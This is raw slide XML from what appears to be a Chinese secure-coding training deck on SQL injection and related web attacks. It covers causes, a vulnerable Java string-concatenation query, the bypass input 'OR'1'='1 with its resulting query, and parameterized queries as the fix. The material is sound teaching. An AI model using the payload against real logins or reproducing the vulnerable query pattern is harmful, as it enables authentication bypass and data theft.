              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>批量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884368" y="3068960"/>
            <a:ext cx="648072" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="974725"/>
            <a:ext cx="8229600" cy="5190579"/>
          </a:xfrm>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="85725" tIns="42863" rIns="85725" bIns="42863" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="321310" indent="-321310" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>定义：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="12700" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>由于程序中对用户输入检查不严格，用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，即</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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="321310" indent="-321310" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 原因分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="263525" lvl="1" indent="-156210" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其本质是对于输入检查不充分，导致</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语句将用户提交的非法数据当作语句的一部分来执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="263525" lvl="1" indent="-156210" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>由于我们的部分</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应用，采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Jsp+JavaBean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>框架，代码中会有直接写</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HQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）语句，而有些</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是用拼串实现的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="321310" indent="-321310" defTabSz="854710">
              <a:defRPr/>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、程序编写者在处理程序和数据库交互时，使用字符串拼接的方式构造</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语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="321310" indent="-321310" defTabSz="854710">
              <a:defRPr/>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、未对用户可控参数进行足够的过滤便将参数内容拼接进入到</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语句中。</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dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入：数字参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31750" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7378700" y="5181600"/>
            <a:ext cx="1249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182880" indent="-1828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1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/login.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31754" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="474663" y="1992313"/>
            <a:ext cx="54784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182880" indent="-18288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1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理员</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8553450" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="1270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FFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>程序员考虑的场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: p@$$w0rd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT COUNT(*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM Users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' and password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p@$$w0rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3225018"/>
            <a:ext cx="8229600" cy="2627991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="85725" tIns="42863" rIns="85725" bIns="42863"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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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dirty="0"/>
              <a:t>错误代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1030821" y="3897313"/>
          <a:ext cx="7101408" cy="2342003"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7101408"/>
              </a:tblGrid>
              <a:tr h="2342003">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>//拼接SQL查询语句</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String sqlString="SELECT * FROM users WHERE fullname='"+</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>form.getFullName()+"'AND password='"+form.getPassword()+"'";</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>正常输入：username=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，password=123456</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SELECT * FROM users WHERE username=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>' AND password='123456'</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>攻击输入：username=tony，password='OR'1'='1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SELECT * FROM users WHERE username=tony'ANDpassword='' </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>OR '1'='1'</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="18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微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入：数字参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1253282"/>
            <a:ext cx="8229600" cy="4464496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="85725" tIns="42863" rIns="85725" bIns="42863"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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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dirty="0"/>
              <a:t>规范要求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>对数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>操作语句中的外部输入参数进行过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>参数化查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="899592" y="2636912"/>
          <a:ext cx="6747148" cy="2304256"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6747148"/>
              </a:tblGrid>
